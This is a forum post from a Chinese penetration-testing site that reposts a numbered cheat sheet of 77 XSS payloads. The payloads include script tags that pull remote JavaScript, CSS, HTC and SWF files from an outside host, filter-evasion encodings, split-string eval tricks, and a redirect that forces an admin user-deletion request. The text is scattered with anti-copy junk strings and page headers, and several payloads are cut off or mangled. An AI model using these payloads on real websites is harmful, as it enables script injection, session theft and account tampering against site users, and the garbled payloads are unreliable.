中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
" v' F6 w7 U$ `: }! V* c* E/ n( c
(1)普通的XSS JavaScript注入
4 z1 v6 q. K. S0 T8 g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ a5 i H% l1 }7 H
(2)IMG标签XSS使用JavaScript命令
+ l q& x R, f! `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) g7 ~( z! l; t- V- G- R! y" r, D
(3)IMG标签无分号无引号
* a$ k' _4 N# c/ M
<IMG SRC=javascript:alert(‘XSS’)>
, D: Z$ q3 I7 S, O e
(4)IMG标签大小写不敏感
; J4 \. Y. m6 |
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
6 j$ M9 }) m# L+ T7 v! ?; B
(5)HTML编码(必须有分号)
/ j$ i: D+ A4 [0 i. {" a$ _9 b; O
<IMG SRC=javascript:alert(“XSS”)>
( z) o" Z8 I; ~; X
(6)修正缺陷IMG标签
* R) K3 a% B0 p4 R/ \2 Y: M
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! h! @9 l$ Q# H r
) l- B$ x% |1 a9 b6 a, ^+ s9 k
! l g& x* X+ H$ l8 [! R! d/ j. q9 R
(7)formCharCode标签(计算器)
" D. t' U* F! O# m ~9 n+ j% o
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 n5 M( k8 D9 k# D
(8)UTF-8的Unicode编码(计算器)
6 z3 b" R% S. V) I' S8 F, _' ~
<IMG SRC=jav..省略..S')>
- [! Q5 }: h+ |% m; m: m
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
% Q1 N0 X$ j3 W8 U' q
<IMG SRC=jav..省略..S')>
1 Y5 b' J( V; j8 z
(10)十六进制编码也是没有分号(计算器)
+ r4 w; w) L/ ?% u( D
<IMG SRC=java..省略..XSS')>
( w! C; i& Q7 n- _# [# \) v
(11)嵌入式标签,将Javascript分开
+ r. {9 X% F* L$ G" p V
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# |) g, g K7 o/ X4 c( q5 P3 O
(12)嵌入式编码标签,将Javascript分开
* w& z+ l. X& A( j
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& p& S. H% Y G
(13)嵌入式换行符
( J2 E+ M( j6 C+ o
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% K C8 D; s: k R4 L) l2 E2 e
(14)嵌入式回车
2 B* |9 s1 ~. P. p, v3 B3 a
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 M: F* y# c8 g0 D% T& T) f
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 D+ o. q& }! o3 n5 R1 X
<IMG SRC=”javascript:alert(‘XSS‘)”>
. G. W7 y$ p! z/ d; y. W/ ]
(16)解决限制字符(要求同页面)
$ t3 B; O% {) I4 g5 h- }. x$ T+ e
<script>z=’document.’</script>
* f$ }+ B, n. F2 V' T. J2 @5 a) k
<script>z=z+’write(“‘</script>
7 C5 Z* P" l! ^. ^+ F$ v
<script>z=z+’<script’</script>
$ {( P6 }8 S' e, J, z" P
<script>z=z+’ src=ht’</script>
# ]: c& @1 _4 M$ c: ?
<script>z=z+’tp://ww’</script>
4 v6 H G' R7 Z0 X; `
<script>z=z+’w.shell’</script>
$ _, ]2 `8 P3 k {" n& g1 i, r
<script>z=z+’.net/1.’</script>
+ R! | [" n! X/ w/ k; ]
<script>z=z+’js></sc’</script>
7 {1 P$ i6 s0 K. \ e3 t
<script>z=z+’ript>”)’</script>
# Q7 t( y0 s) L S
<script>eval_r(z)</script>
5 _, g( l2 d* r2 Z& l; _1 A8 B
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
: U& p# m5 n5 j" T. R6 V
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
8 E" p9 R8 K: h5 |7 P9 i* ?$ a4 {
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
) d0 W+ U, R% r( v
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
' `6 u( n$ g2 s0 T9 u8 \, q* F6 o
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ b; {, p5 ~, M% `/ K- B/ j, v
(19)Spaces和meta前的IMG标签
2 ]2 ]: j0 `- `) ~
<IMG SRC=” javascript:alert(‘XSS’);”>
/ x9 a' D [: u4 t( c* c9 \ g' `
(20)Non-alpha-non-digit XSS
: R. ^- i. S3 {. v) \* b
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
8 m% P: c# N" M* r; S! w* i
(21)Non-alpha-non-digit XSS to 2
0 f% \, E0 M7 |! H/ ^0 @
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( i+ `& m7 ^5 w! L
(22)Non-alpha-non-digit XSS to 3
* ?4 Q2 w7 A4 ?
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
" ?4 K0 E- \, T/ i& ?3 j
(23)双开括号
! o# u4 ^: j! f" w4 ~9 A
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: F. z( e) u0 X0 o) J9 x5 i
(24)无结束脚本标记(仅火狐等浏览器)
2 _. @9 e6 T6 X" D6 ^
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
4 n# V. f+ H& @
(25)无结束脚本标记2
; f- e1 ^! U. ?' y' n4 \4 c8 l
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 ]) g9 K- f. J2 \
(26)半开的HTML/JavaScript XSS
5 O1 n/ U k8 `
<IMG SRC=”javascript:alert(‘XSS’)”
: I$ g& F7 |% ^6 r3 g5 S
(27)双开角括号
2 x0 K3 A# Y6 V/ Y
<iframe src=http://3w.org/XSS.html <
9 m9 y/ \$ E( x4 q
(28)无单引号 双引号 分号
% q! D/ ^# j, k! c' J0 a9 C8 S
<SCRIPT>a=/XSS/
! S$ t3 x9 d9 T
alert(a.source)</SCRIPT>
- c" b! ~0 ~. D, H
(29)换码过滤的JavaScript
+ o& B3 a$ I0 `, t0 m3 F
\”;alert(‘XSS’);//
( ]4 a! A5 ^9 U2 n/ U0 g% a$ \! N
(30)结束Title标签
* n/ w- B+ C4 E$ v5 l5 |
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
# j/ W. c) G, h! s) [
(31)Input Image
3 E* u& B; ~; z8 g! ]( F1 {" V
<INPUT SRC=”javascript:alert(‘XSS’);”>
4 B* v% ^+ W' r/ ]
(32)BODY Image
& x# K. \" [, M1 Q
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
p9 \5 _! b/ ]5 {+ ?7 @ D7 @+ s
(33)BODY标签
?6 M% l1 v: f2 f; Q5 v4 e T2 [+ Q
<BODY(‘XSS’)>
l5 m z! v" A5 {" Z
(34)IMG Dynsrc
5 m' C( ]7 M1 ~2 Y
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
8 `* G, Q: o6 {
(35)IMG Lowsrc
! @3 q {/ N% F+ K0 \
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
4 F; @; D* x7 Y8 W! D
(36)BGSOUND
; q; g: |2 `! z- i
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
% ]& a x7 B$ n9 Q/ I
(37)STYLE sheet
. g3 U o0 N6 ^% M( b1 q) O3 q
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
7 s9 v* z1 C( _8 @0 Q
(38)远程样式表
6 s4 a( {2 s# Y5 M) @4 W
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
6 J3 A' C, c( `( S
(39)List-style-image(列表式)
+ [) u7 P" V6 I) ?) S9 f4 p
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: ` f1 x" W$ O" C& W0 D( V
(40)IMG VBscript
+ ?& U$ a( Y5 V
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 w! I/ S! i$ |7 n6 a( W+ K+ W
(41)META链接url
d; h7 e$ J% l8 v! V5 c* y. R
# n/ q0 H- C& z7 s; Q9 U' m
# l4 L5 b3 h' g# a
<META HTTP-EQUIV=”refresh” CONTENT=”0;
6 P2 v* b# P1 m' r$ Z( ^
URL=http://;URL=javascript:alert(‘XSS’);”>
7 P8 H( g, z& ]3 ?( C+ U
(42)Iframe
4 A, f! i6 }" {6 ^% M9 e$ Z
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 x% `7 z( T. i. j
(43)Frame
K8 t: ~6 b' G4 D. t; {% |
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
1 V1 ]) M, E0 ?$ m3 i5 u' ^: l
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
9 x: R" ]6 E1 {9 P' I. K& P! F
(44)Table
0 Y& H1 { k, ~$ B* C
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
% r8 W! D5 X' U2 r; Z* T# u3 W2 K
(45)TD
# A$ F6 [, V# W
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
# y, Q/ H: K. E4 g
(46)DIV background-image
' t- G p# B! g
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 }# D' W `; G
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
3 V( U6 Q- v! _" n$ h; J
8&13&12288&65279)
! f' c% r% ^& G
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! _# ~0 y ^5 |8 ?0 w
(48)DIV expression
& Z4 I& O3 \ X8 O+ B
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
+ K" X( T G% X' c) u
(49)STYLE属性分拆表达
_1 j. g& A8 m, `- j4 C: \7 ]
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
6 \, S6 h& h, E2 V+ L2 Q
(50)匿名STYLE(组成:开角号和一个字母开头)
3 e5 ]) G0 L* w# _
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" K& R6 i$ {. T
(51)STYLE background-image
( W6 [1 i3 a* T% N
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
, c3 M( S; r w2 ^( O2 w
CLASS=XSS></A>
( c8 n# }+ q& T) G
(52)IMG STYLE方式
- H2 k: N- X- R1 X" A6 @' E s
exppression(alert(“XSS”))’>
9 z6 E& q: R5 g+ }' P& B
(53)STYLE background
* ~* O9 w4 [; a0 C* w: i
<STYLE><STYLE
$ D/ g4 \7 ?, Y9 ?7 [0 u$ L
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* q/ E4 Y6 a9 q8 X9 R( ^# I
(54)BASE
& z; F2 S% K" o q, ?$ w7 M; m
<BASE HREF=”javascript:alert(‘XSS’);//”>
5 p0 u* g+ N: Z1 ]* N& ]2 v: e# }
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! ^$ [7 ~7 J1 g) ~+ y
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
1 }6 X5 t7 w# J' w$ O5 l
(56)在flash中使用ActionScrpt可以混进你XSS的代码
) ^0 a/ [. l9 k& J8 L
a=”get”;
$ L0 S( N1 |5 A4 ~& ^3 C
b=”URL(\”";
. d3 u8 a' l8 j6 |- D' A( y
c=”javascript:”;
3 v3 S% k: g7 o! r, ?
d=”alert(‘XSS’);\”)”;
- z0 B, X f2 b9 j# X
eval_r(a+b+c+d);
$ q6 w% `0 f3 b* t! ~ Q
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
. U' ?9 y4 I6 m" A( _
<HTML xmlns:xss>
; \1 J: H9 B* Q$ c, |" x
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
5 A% `( @. Y1 X4 S" o1 ?' [
<xss:xss>XSS</xss:xss>
n* ~+ }" A8 c- ^
</HTML>
m" I& j2 T4 R& ]$ X+ e
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
8 |; d, I& H$ q0 H6 v/ b" j
<SCRIPT SRC=””></SCRIPT>
! ~( V! K2 S+ W, |: t
(59)IMG嵌入式命令,可执行任意命令
8 m, n: l8 _" q: R/ b
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
" k2 I g' H/ I T! w$ L
(60)IMG嵌入式命令(a.jpg在同服务器)
. q( T8 e5 ~2 i2 C
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
+ ~+ x" d+ {; ~) @! [
(61)绕符号过滤
# {0 V. a3 q* _# c
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
, F- P+ N, r; Y2 \8 N
(62)
. ]/ Q% P1 U5 H' a
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
3 S& E5 b8 i6 s& t* i2 T
(63)
: M" p, E' G& E$ z$ Q. W, O& {) P" @( t
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
! r0 M i& C- W8 P% E3 e$ W: n& s
(64)
- S+ G" h/ R7 |. Q1 ]9 ?
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
% B! k/ d% i0 V6 t3 t" B _
(65)
# m- o& f: i3 b$ j
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
- X; E. E' G- j% |! c
(66)12-7-1 T00LS - Powered by Discuz! Board
& _; w$ @9 z& n0 I( Q
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
$ {, |) b. |) B+ K0 m
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
4 n6 }: Q9 j9 V' P& S
(67)
, ?* V, X6 M- s9 X% V
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
, H o9 O" V) C, L
</SCRIPT>
0 @9 W, q# V! o' L' ^/ h
(68)URL绕行
/ K% Y3 O6 y% `- j% J1 p
<A HREF=”
http://127.0.0.1/
”>XSS</A>
1 n; b' m3 [8 w6 `0 o+ ]
(69)URL编码
2 U* w! V$ C1 g$ }7 R' }& G' n
<A HREF=”
http://3w.org
”>XSS</A>
5 \8 O, X* _3 a( D" ~0 Z7 ~, |; o
(70)IP十进制
( r# h0 p1 ]6 \: i6 j( J
<A HREF=”http://3232235521″>XSS</A>
5 \) X. ~8 _' h
(71)IP十六进制
5 s" y$ O9 f0 D5 P+ e- g9 F9 f3 H
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
+ L" }1 h' d" \6 |. b
(72)IP八进制
$ H& P a9 l) n
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
/ a; W* `. q# e( p
(73)混合编码
9 S3 e: [% x- J1 l
<A HREF=”h
2 J/ n* L9 i4 K3 q* h" ~1 T7 B. h/ E& x
tt p://6 6.000146.0×7.147/”">XSS</A>
7 c) v6 S. _. ]5 B2 Z. W0 K: q
(74)节省[http:]
) H. i4 |6 d6 k, a
<A HREF=”//www.google.com/”>XSS</A>
8 n5 Y4 L% `9 @$ q" ^$ n% t g
(75)节省[www]
; Y/ q& d) |& R, v& n2 w
<A HREF=”
http://google.com/
”>XSS</A>
7 g9 |* ]9 @* a) j2 A" s( s( e
(76)绝对点绝对DNS
. c; y7 U( v% L& J7 c4 Q
<A HREF=”
http://www.google.com./
”>XSS</A>
5 P( z; N7 M3 h0 F
(77)javascript链接
# _8 c7 d" p. P2 N1 E' J: x: }$ C
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
% S! s, C$ k+ e1 R
4 t+ R( E1 F/ S; B( W
原文地址:
http://fuzzexp.org/u/0day/?p=14
- q$ T6 m A0 W8 f4 H- M
' @) ]* Y7 Z+ K# p
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2